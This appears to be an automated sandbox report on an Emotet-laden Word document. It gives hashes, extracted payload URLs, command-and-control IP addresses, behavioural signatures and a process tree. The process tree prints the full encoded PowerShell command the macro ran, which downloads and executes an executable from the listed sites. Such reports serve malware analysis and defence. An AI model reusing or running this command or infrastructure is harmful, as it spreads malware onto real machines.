Analysis
-
max time kernel
58s -
max time network
59s -
platform
windows7_x64 -
resource
win7 -
submitted
17-07-2020 20:24
Static task
static1
General
-
Target
a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc
-
Size
190KB
-
MD5
c3d62c1dccfaacec14d62bbe29629d0a
-
SHA1
c13a5804da6c7bbd550d135da5026077a218ccb6
-
SHA256
a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb
-
SHA512
e63e53199dabc0a7c6ce1fbc8838a2d72110498ea1c94bf78655d2bb02722627fe769389783f8066bafc775e82166d0662e73c18c1ae1d8097180affa0918086
Malware Config
Extracted
http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
http://defensacovid.com/wp-admin/dGzIMVvo/
http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/
http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/
http://karir-up.com/wp-admin/CCzj96yk23/
Extracted
emotet
177.144.130.105:443
198.27.69.201:8080
157.7.164.178:8081
78.188.170.128:80
203.153.216.178:7080
77.74.78.80:443
178.33.167.120:8080
177.0.241.28:80
143.95.101.72:8080
51.38.201.19:7080
181.167.35.84:80
41.185.29.128:8080
192.163.221.191:8080
181.164.110.7:80
203.153.216.182:7080
80.211.32.88:8080
113.160.180.109:80
185.142.236.163:443
192.241.220.183:8080
87.106.231.60:8080
113.161.148.81:80
181.230.65.232:80
50.116.78.109:8080
91.83.93.103:443
179.5.118.12:80
75.127.14.170:8080
46.32.229.152:8080
37.70.131.107:80
140.207.113.106:443
181.134.9.162:80
139.59.12.63:8080
46.105.131.68:8080
37.208.106.146:8080
125.63.106.22:80
110.44.113.2:8080
81.214.253.80:443
37.46.129.215:8080
14.99.112.138:80
190.251.235.239:80
190.171.153.139:80
190.55.233.156:80
46.49.124.53:80
74.208.173.91:8080
163.172.107.70:8080
192.210.217.94:8080
115.79.195.246:80
212.112.113.235:80
211.20.154.102:80
220.128.125.18:80
45.118.136.92:8080
216.75.37.196:8080
195.201.56.70:8080
Signatures
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXE997.exeperfts.exepid process 1496 WINWORD.EXE 1496 WINWORD.EXE 1392 997.exe 1392 997.exe 1932 perfts.exe 1932 perfts.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\FLAGS WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A7C24E86-E0D8-47FA-9D34-A1CF79FE852D}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1784 powersheLL.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 5 1784 powersheLL.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1496 WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 1516 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powersheLL.exeperfts.exepid process 1784 powersheLL.exe 1784 powersheLL.exe 1932 perfts.exe 1932 perfts.exe 1932 perfts.exe -
Executes dropped EXE 2 IoCs
Processes:
997.exeperfts.exepid process 1392 997.exe 1932 perfts.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
997.exedescription pid process target process PID 1392 wrote to memory of 1932 1392 997.exe perfts.exe PID 1392 wrote to memory of 1932 1392 997.exe perfts.exe PID 1392 wrote to memory of 1932 1392 997.exe perfts.exe PID 1392 wrote to memory of 1932 1392 997.exe perfts.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
perfts.exepid process 1932 perfts.exe -
Drops file in System32 directory 2 IoCs
Processes:
powersheLL.exe997.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe File opened for modification C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe 997.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc"1⤵
- Suspicious use of SetWindowsHookEx
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:1496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQByAGAASQBUAFkAYABwAHIATwB0AE8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABjAGUAdQBkAGoAdQBqACAAPQAgACcAOQA5ADcAJwA7ACQAcQB1AHUAdQB2AGoAbwBlAGwAYgBlAGEAawB6AGUAbwBwAGcAdQB2AG4AbwBhAGQAPQAnAG0AbwBlAHEAdQB2AGUAbwB0AGgAcABhAHUAcgBqAGUAZQBjACcAOwAkAG4AaQBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjAGUAdQBkAGoAdQBqACsAJwAuAGUAeABlACcAOwAkAHIAaQBlAHkAZgBvAGUAeQBoAG8AdQBjAGYAbwBlAG0APQAnAHkAdQBhAHcAbQBlAG8AbABkAG8AaQB6AGQAYQBqACcAOwAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAGIAYwBsAEkARQBOAHQAOwAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYwBhAG4ALgB0AHIAaQAtAGMAbwBtAG0AYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AQgBtAEsATwBlAHkAYwBtADAANwAwADQALwAqAGgAdAB0AHAAOgAvAC8AZABlAGYAZQBuAHMAYQBjAG8AdgBpAGQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGQARwB6AEkATQBWAHYAbwAvACoAaAB0AHQAcAA6AC8ALwBkAG8AbwByAGIAaABhAGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAcQA2AEsAZABvAGkAcwBrADEAcgA0ADAANgAwADQANQAzAC8AKgBoAHQAdABwADoALwAvAGEAZwBpAGwAZQBuAHQAZwBhAG0AZQAuAHIAZQB2AGkAZQB3AHMAaABlAGwAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGMAcwBvAGEANAA1AGcAdwA1ADEAMwAxADUAOQAzADUALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAaQByAC0AdQBwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBDAEMAegBqADkANgB5AGsAMgAzAC8AJwAuACIAUwBgAHAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABtAGEAaQBiAD0AJwBkAG8AdQB5AGMAaAB1AGEAcwBsAGUAbwB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJAByAGEAbwBiAHoAZQB1AHgAIABpAG4AIAAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgApAHsAdAByAHkAewAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsALgAiAEQATwBXAG4AYABsAE8AQQBgAEQAZgBgAGkATABlACIAKAAkAHIAYQBvAGIAegBlAHUAeAAsACAAJABuAGkAYgApADsAJAB0AGgAbwBhAGsAdABhAGUAaAB6AGUAcgB0AG8AeABkAHUAYQB4AHcAZQBvAHgAPQAnAHYAZQBhAHEAdQB0AGgAaQBhAGMAdABoAGkAZQB3AHQAaABhAHUAawB0AGgAbwBvAG4AaABpAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABuAGkAYgApAC4AIgBsAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwAwADcAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAZQBgAEEAVABFACIAKAAkAG4AaQBiACkAOwAkAHkAZQBqAGsAaQBvAG0AawBhAHUAeQB6AG8AaAA9ACcAdABpAGUAYgAnADsAYgByAGUAYQBrADsAJAB0AGgAbwBvAHcAcgBhAHUAdABkAHUAZwA9ACcAaABvAHUAdAB3AGkAbwBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBvAGkAbQBjAGEAbwBuAGoAbwBhAGQAeQBpAGEAdgBqAG8AYQBoAHoAdQB1AGwAPQAnAHkAdQB1AG4AbQBvAGYAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1784
-
C:\Users\Admin\997.exeC:\Users\Admin\997.exe1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1392 -
C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe"C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:1932